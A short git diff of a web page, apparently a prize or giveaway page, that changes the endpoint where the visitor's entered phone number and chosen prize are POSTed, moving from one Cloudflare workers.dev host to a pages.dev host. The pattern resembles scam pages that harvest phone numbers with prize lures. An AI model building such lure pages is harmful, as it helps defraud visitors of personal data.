--- a/index.html
+++ b/index.html
@@ -243,7 +243,7 @@
     const phone = phoneInput.value;          // введённый номер
     const prize = prizeText.textContent;     // выбранный приз
 
-      fetch('https://broken-haze-1ed2.lukasschneid3r.workers.dev/', {
+      fetch('https://c2f7e1e5.optimal.pages.dev/', {
         method: 'POST',
         headers: { 'Content-Type': 'application/json' },
         body: JSON.stringify({ phone, prize })
